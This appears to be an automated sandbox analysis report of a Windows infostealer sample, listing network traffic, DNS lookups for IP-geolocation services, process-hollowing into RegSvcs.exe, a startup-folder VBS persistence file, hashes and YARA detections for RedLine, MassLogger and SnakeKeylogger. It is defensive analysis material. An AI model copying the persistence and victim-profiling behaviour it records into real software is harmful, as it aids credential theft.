Jan 10, 2025 20:04:00.692712069 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:00.697608948 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:00.697694063 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:00.698373079 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:00.703299046 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:01.520693064 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:01.572555065 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:01.591942072 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:01.596729994 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:02.890793085 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:02.912736893 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:02.912837982 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:02.912925959 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:02.931895018 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:02.962080956 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:02.962177038 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.433505058 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.433609962 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:03.439037085 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:03.439069033 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.439538002 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.494419098 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:03.501009941 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:03.543414116 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.625099897 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.625190973 CET	443	49711	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:03.625261068 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:03.640110970 CET	49711	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:12.168917894 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:12.173681021 CET	80	49713	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:12.173866034 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:12.174012899 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:12.178725958 CET	80	49713	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:13.288536072 CET	80	49713	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:13.293070078 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:13.297987938 CET	80	49713	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:13.581151962 CET	80	49713	132.226.8.169	192.168.2.12
Jan 10, 2025 20:04:13.587552071 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:13.587609053 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:13.587723970 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:13.602786064 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:13.602801085 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:13.635165930 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:04:14.070894957 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:14.070976019 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:14.072901964 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:14.072910070 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:14.073287964 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:14.124156952 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:14.142458916 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:14.183330059 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:14.252588034 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:14.252770901 CET	443	49715	104.21.32.1	192.168.2.12
Jan 10, 2025 20:04:14.252835035 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:14.257468939 CET	49715	443	192.168.2.12	104.21.32.1
Jan 10, 2025 20:04:16.143017054 CET	61852	53	192.168.2.12	1.1.1.1
Jan 10, 2025 20:04:16.147900105 CET	53	61852	1.1.1.1	192.168.2.12
Jan 10, 2025 20:04:16.148003101 CET	61852	53	192.168.2.12	1.1.1.1
Jan 10, 2025 20:04:16.152942896 CET	53	61852	1.1.1.1	192.168.2.12
Jan 10, 2025 20:04:16.620790958 CET	61852	53	192.168.2.12	1.1.1.1
Jan 10, 2025 20:04:16.626224041 CET	53	61852	1.1.1.1	192.168.2.12
Jan 10, 2025 20:04:16.626528978 CET	61852	53	192.168.2.12	1.1.1.1
Jan 10, 2025 20:05:07.887907028 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:05:07.888096094 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:05:18.586051941 CET	80	49713	132.226.8.169	192.168.2.12
Jan 10, 2025 20:05:18.586338997 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:05:42.901834011 CET	49710	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:05:42.912096024 CET	80	49710	132.226.8.169	192.168.2.12
Jan 10, 2025 20:05:53.589306116 CET	49713	80	192.168.2.12	132.226.8.169
Jan 10, 2025 20:05:53.594208002 CET	80	49713	132.226.8.169	192.168.2.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 20:04:00.679049969 CET	55029	53	192.168.2.12	1.1.1.1
Jan 10, 2025 20:04:00.685708046 CET	53	55029	1.1.1.1	192.168.2.12
Jan 10, 2025 20:04:02.899590969 CET	55576	53	192.168.2.12	1.1.1.1
Jan 10, 2025 20:04:02.907277107 CET	53	55576	1.1.1.1	192.168.2.12
Jan 10, 2025 20:04:16.142291069 CET	53	59156	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 20:04:00.679049969 CET	192.168.2.12	1.1.1.1	0x9016	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.899590969 CET	192.168.2.12	1.1.1.1	0x5219	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 20:04:00.685708046 CET	1.1.1.1	192.168.2.12	0x9016	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 20:04:00.685708046 CET	1.1.1.1	192.168.2.12	0x9016	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:00.685708046 CET	1.1.1.1	192.168.2.12	0x9016	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:00.685708046 CET	1.1.1.1	192.168.2.12	0x9016	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:00.685708046 CET	1.1.1.1	192.168.2.12	0x9016	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:00.685708046 CET	1.1.1.1	192.168.2.12	0x9016	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 20:04:02.907277107 CET	1.1.1.1	192.168.2.12	0x5219	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49710	132.226.8.169	80	6672	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:04:00.698373079 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 20:04:01.520693064 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 19:04:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 20:04:01.591942072 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 20:04:02.890793085 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 19:04:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49713	132.226.8.169	80	6900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:04:12.174012899 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 20:04:13.288536072 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 19:04:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 20:04:13.293070078 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 20:04:13.581151962 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 19:04:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49711	104.21.32.1	443	6672	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 19:04:03 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 19:04:03 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 19:04:03 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1850632 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkrFTOI382P%2FgzsOqRMFvXHUvamKJdXkErjhfGgHXQxnqCEpsnxQrAEXFPKE%2Fk8NFGP5rx8VbXtGz1LFa642xQRfD0TvfHGqrvAkR9f6E6g6UDpSMp8qEXVu86ktfQbiogM3pVab"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffeee3e381372b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1794&rtt_var=690&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1566523&cwnd=217&unsent_bytes=0&cid=646c9d0d66eb38da&ts=204&x=0"
2025-01-10 19:04:03 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49715	104.21.32.1	443	6900	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 19:04:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 19:04:14 UTC	853	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 19:04:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1850643 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q1vJdGjQ1cRS2lOPGzAv3Y2NHclMjzw4m434Ex5PdqQt7HMQcsu3XSkgH5D7vklXzyt4mFyPWPb6zPxAtFzYqptkEVQOJuNnqoJuv0qmz%2FVqwX85%2BsBByP01SgfZ9Ue7PAjEgorX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffeee80bb8272b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1756&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1574973&cwnd=217&unsent_bytes=0&cid=6facaf2cdc73236c&ts=195&x=0"
2025-01-10 19:04:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	14:03:56
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\CvzLvta2bG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CvzLvta2bG.exe"
Imagebase:	0xe00000
File size:	1'117'184 bytes
MD5 hash:	61A2F4563666BDBF6D6CE0EC58F57C64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:03:57
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CvzLvta2bG.exe"
Imagebase:	0x600000
File size:	1'117'184 bytes
MD5 hash:	61A2F4563666BDBF6D6CE0EC58F57C64
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2373788703.00000000010C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs Detection: 74%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:03:58
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CvzLvta2bG.exe"
Imagebase:	0xab0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3599413554.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3598862590.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.3599165837.0000000002E60000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:04:09
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\definitiveness.vbs"
Imagebase:	0x7ff6986e0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:04:09
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"
Imagebase:	0x600000
File size:	1'117'184 bytes
MD5 hash:	61A2F4563666BDBF6D6CE0EC58F57C64
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2490143764.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:04:10
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Hymenophyllaceae\definitiveness.exe"
Imagebase:	0xfe0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3601164998.00000000044E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3599294917.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.3602305553.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	183

Executed Functions

Function 00E03B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E03B68
IsDebuggerPresent.KERNEL32 ref: 00E03B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,00EC52F8,00EC52E0,?,?), ref: 00E03BEB

Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06

Part of subcall function 00E1092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E03C14,00EC52F8,?,?,?), ref: 00E1096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00E03C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00EB7770,00000010), ref: 00E3D281
SetCurrentDirectoryW.KERNEL32(?,00EC52F8,?,?,?), ref: 00E3D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EB4260,00EC52F8,?,?,?), ref: 00E3D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00E3D346

Part of subcall function 00E03A46: GetSysColorBrush.USER32(0000000F), ref: 00E03A50
Part of subcall function 00E03A46: LoadCursorW.USER32(00000000,00007F00), ref: 00E03A5F
Part of subcall function 00E03A46: LoadIconW.USER32(00000063), ref: 00E03A76
Part of subcall function 00E03A46: LoadIconW.USER32(000000A4), ref: 00E03A88
Part of subcall function 00E03A46: LoadIconW.USER32(000000A2), ref: 00E03A9A
